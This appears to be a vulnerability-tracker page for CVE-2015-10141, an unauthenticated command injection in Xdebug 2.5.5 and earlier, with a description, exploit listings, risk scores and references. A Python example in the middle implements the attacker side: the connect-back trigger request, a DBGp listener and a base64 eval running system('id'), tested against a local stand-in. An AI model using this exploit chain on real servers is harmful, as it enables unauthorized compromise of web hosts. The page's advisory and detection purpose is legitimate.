CVE-2015-10141

Severity: CRITICAL · Nuclei template available

Xdebug <= 2.5.5 - Unauthenticated OS Command Injection via Remote Debugger Interface

Title source: llm

Exploitation Summary

EIP tracks 4 public exploits for CVE-2015-10141. PoCs published by Metasploit, D3Ext, n0m4d22, including Metasploit module exploits/unix/http/xdebug_unauth_exec. A Nuclei detection template is also available.

AI-analyzed exploit summary: This Metasploit module exploits a vulnerability in Xdebug versions 2.5.5 and below, allowing unauthenticated OS command execution via the eval command. It establishes a reverse shell by leveraging the Xdebug debugger session.

Description

An unauthenticated OS command injection vulnerability exists in Xdebug versions 2.5.5 and earlier, a PHP debugging extension developed by Derick Rethans. The flaw is in the remote debugging feature (xdebug.remote_enable=1). Xdebug does not itself listen on a port: when a request starts a debug session (for example with the XDEBUG_SESSION_START query parameter), the PHP process connects out to the debug client at xdebug.remote_host:xdebug.remote_port (default 9000), and with xdebug.remote_connect_back=1 it connects to whatever address the request supplied in the X-Forwarded-For header or REMOTE_ADDR. The resulting DBGp connection carries no authentication, so whoever answers on that port can issue an eval command carrying base64-encoded PHP, which the process executes and which may invoke system-level functions such as system() or passthru(). An attacker therefore needs only to reach the web application and to be reachable from it on the debug port (remote exploitation relies on remote_connect_back being enabled or on a remote_host the attacker controls). This results in full compromise of the host under the privileges of the web server user. The official CVE text describes port 9000 as one Xdebug "listens" on; in practice the connection is outbound from the target, which matters for both firewalling and detection.
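
The exchange described above, as an added example that is not the page's, the Metasploit module's or any of the listed PoCs' code: the attacker side builds the session-starting HTTP request, waits for the connect-back, checks the DBGp init packet and sends one eval command; a constructed stand-in for a vulnerable Xdebug plays the target side so the whole thing runs offline against 127.0.0.1. The X-Forwarded-For trigger is the technique the Metasploit module uses; the host, path and IP values, the idekey "phpstorm", the fake init/response XML and the command output are all constructed sample data.

```python
import base64
import socket
import threading
import xml.etree.ElementTree as ET

DBGP_NS = "{urn:debugger_protocol_v1}"  # default namespace of DBGp packets


def build_trigger_request(target_host, path, listener_ip, idekey="phpstorm"):
    """HTTP request that starts a debug session; with xdebug.remote_connect_back=1
    the X-Forwarded-For value becomes the connect-back address (sample values)."""
    return (
        f"GET {path}?XDEBUG_SESSION_START={idekey} HTTP/1.1\r\n"
        f"Host: {target_host}\r\n"
        f"X-Forwarded-For: {listener_ip}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def build_eval_command(php_code, txn_id=1):
    """DBGp eval: '-i' is the transaction id, the data is base64 PHP, NUL-terminated."""
    data = base64.b64encode(php_code.encode()).decode()
    return f"eval -i {txn_id} -- {data}\0".encode()


def read_dbgp_message(sock):
    """Read one DBGp packet framed as '<decimal length>\\0<xml>\\0'."""
    length = b""
    while (byte := sock.recv(1)) != b"\0":
        if not byte:
            raise ConnectionError("peer closed before length")
        length += byte
    size, body = int(length), b""
    while len(body) < size:
        chunk = sock.recv(size - len(body))
        if not chunk:
            raise ConnectionError("peer closed mid-packet")
        body += chunk
    sock.recv(1)  # trailing NUL
    return body


def decode_eval_response(xml_bytes):
    """Return the <property> value of an eval response, base64-decoding when flagged."""
    prop = ET.fromstring(xml_bytes).find(DBGP_NS + "property")
    if prop is None:
        return None
    text = prop.text or ""
    return base64.b64decode(text).decode(errors="replace") if prop.get("encoding") == "base64" else text


def start_listener(port=0, timeout=5):
    """Attacker-side debug client socket; port 0 picks a free port for the demo."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    srv.settimeout(timeout)
    return srv


def handle_session(srv, php_code, timeout=5):
    """Accept the connect-back, verify the init packet, run one eval, return its result."""
    conn, _ = srv.accept()
    conn.settimeout(timeout)
    with conn:
        if ET.fromstring(read_dbgp_message(conn)).tag != DBGP_NS + "init":
            raise ValueError("expected a DBGp init packet")
        conn.sendall(build_eval_command(php_code, 1))
        return decode_eval_response(read_dbgp_message(conn))


def _frame(xml):
    return str(len(xml)).encode() + b"\0" + xml + b"\0"


def fake_xdebug_connect(port, result_text):
    """Constructed stand-in for a vulnerable Xdebug: connects back, sends init,
    answers the first eval with result_text as a base64 string property."""
    with socket.create_connection(("127.0.0.1", port)) as s:
        s.sendall(_frame(b'<?xml version="1.0" encoding="iso-8859-1"?>'
                         b'<init xmlns="urn:debugger_protocol_v1" fileuri="file:///var/www/html/index.php" '
                         b'language="PHP" protocol_version="1.0" appid="1234" idekey="phpstorm"></init>'))
        cmd = b""
        while not cmd.endswith(b"\0"):
            chunk = s.recv(1024)
            if not chunk:
                return
            cmd += chunk
        txn = cmd.split(b" ")[2].decode()  # 'eval -i <txn> -- <data>'
        b64 = base64.b64encode(result_text.encode()).decode()
        s.sendall(_frame(('<?xml version="1.0" encoding="iso-8859-1"?>'
                          f'<response xmlns="urn:debugger_protocol_v1" command="eval" transaction_id="{txn}">'
                          f'<property type="string" encoding="base64"><![CDATA[{b64}]]></property>'
                          '</response>').encode()))


def demo(result_text="uid=33(www-data) gid=33(www-data)"):
    """Run the full exchange locally with the constructed Xdebug stand-in."""
    srv = start_listener()
    peer = threading.Thread(target=fake_xdebug_connect, args=(srv.getsockname()[1], result_text))
    peer.start()
    try:
        return handle_session(srv, "system('id');")
    finally:
        peer.join()
        srv.close()


if __name__ == "__main__":
    print(build_trigger_request("target.example", "/index.php", "10.0.0.5").decode())
    print(demo())
```

Against a real target the listener is started first, the trigger request is sent over HTTP, and the connect-back arrives on the listener's port; the direction of that connection is why egress filtering from web tiers and alerting on PHP workers opening outbound connections to port 9000 both catch this class of exploitation.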

Exploits (4)

ExploitDB · Working PoC · Verified
by Metasploit · tags: ruby, remote, php
https://www.exploit-db.com/exploits/44568

This Metasploit module exploits a vulnerability in Xdebug versions 2.5.5 and below, allowing unauthenticated OS command execution via the eval command. It establishes a reverse shell by leveraging the Xdebug debugger session.

Classification: Working PoC (95%) · Attack type: RCE · Complexity: Moderate · Reliability: Reliable
Target: Xdebug versions 2.5.5 and below · No auth needed
Prerequisites: Xdebug enabled on the target server · Network access to the target · Writable directory on the target
Analyzed by devstral-2, Feb 16, 2026
nomisec · Working PoC · 30 stars
by D3Ext · tags: poc
https://github.com/D3Ext/CVE-2015-10141

This is a functional exploit for CVE-2015-10141, targeting Xdebug v2.5.5 and earlier. It leverages unauthenticated command execution via the Xdebug debugger interface on port 9000, allowing arbitrary PHP code execution.

Classification: Working PoC (95%) · Attack type: RCE · Complexity: Moderate · Reliability: Reliable
Target: Xdebug v2.5.5 and earlier · No auth needed
Prerequisites: Xdebug remote debugging enabled · Target PHP application accessible · Target able to connect back to the attacker's listener on the debug port (9000 by default)
Analyzed by devstral-2, Feb 16, 2026
nomisec · Working PoC
by n0m4d22 · tags: poc
https://github.com/n0m4d22/PoC-CVE-2015-10141-Xdebug

This is a functional Python exploit for CVE-2015-10141, targeting Xdebug ≤ 2.5.5. It leverages the unauthenticated debugging protocol on port 9000 to achieve remote command execution via base64-encoded PHP system() calls.

Classification: Working PoC (95%) · Attack type: RCE · Complexity: Moderate · Reliability: Reliable
Target: Xdebug ≤ 2.5.5 · No auth needed
Prerequisites: Target running Xdebug ≤ 2.5.5 with remote debugging enabled · Network access to the target, and a path from the target back to the attacker's listener on port 9000
Analyzed by devstral-2, Feb 16, 2026
Metasploit · Working PoC · Excellent
by Ricter Zheng, Shaksham Jaiswal, Mumbai · tags: ruby, poc, php
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/http/xdebug_unauth_exec.rb

This Metasploit module exploits a vulnerability in Xdebug versions 2.5.5 and below, allowing unauthenticated remote command execution via the eval command. It sets up a TCP server to deliver a base64-encoded PHP payload to the target.

Classification: Working PoC (95%) · Attack type: RCE · Complexity: Moderate · Reliability: Reliable
Target: Xdebug versions 2.5.5 and below · No auth needed
Prerequisites: Xdebug enabled on the target server · Network access to the target
Analyzed by devstral-2, Feb 16, 2026

Nuclei Templates (1)

Xdebug <= 2.5.5 - Command Injection
Critical · Verified · by pwnhxl

References (6)

Core references
https://xdebug.org/ · product (various sources)
https://www.exploit-db.com/exploits/44568 · exploit, third-party advisory
https://www.fortiguard.com/encyclopedia/ips/46000 · vendor advisory, third-party advisory

Scores

CVSS v4: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)
EPSS: 0.6571 (65.7% probability of exploitation activity in the next 30 days), percentile 98.5%

CISA SSVC (Vulnrichment)

Exploitation: poc · Automatable: yes · Technical Impact: total

Details

CWE: CWE-306 (Missing Authentication for Critical Function), CWE-78 (OS Command Injection)
Status: published
Products (1): Xdebug/Xdebug <= 2.5.5
Published: Jul 23, 2025
Tracked since: Feb 18, 2026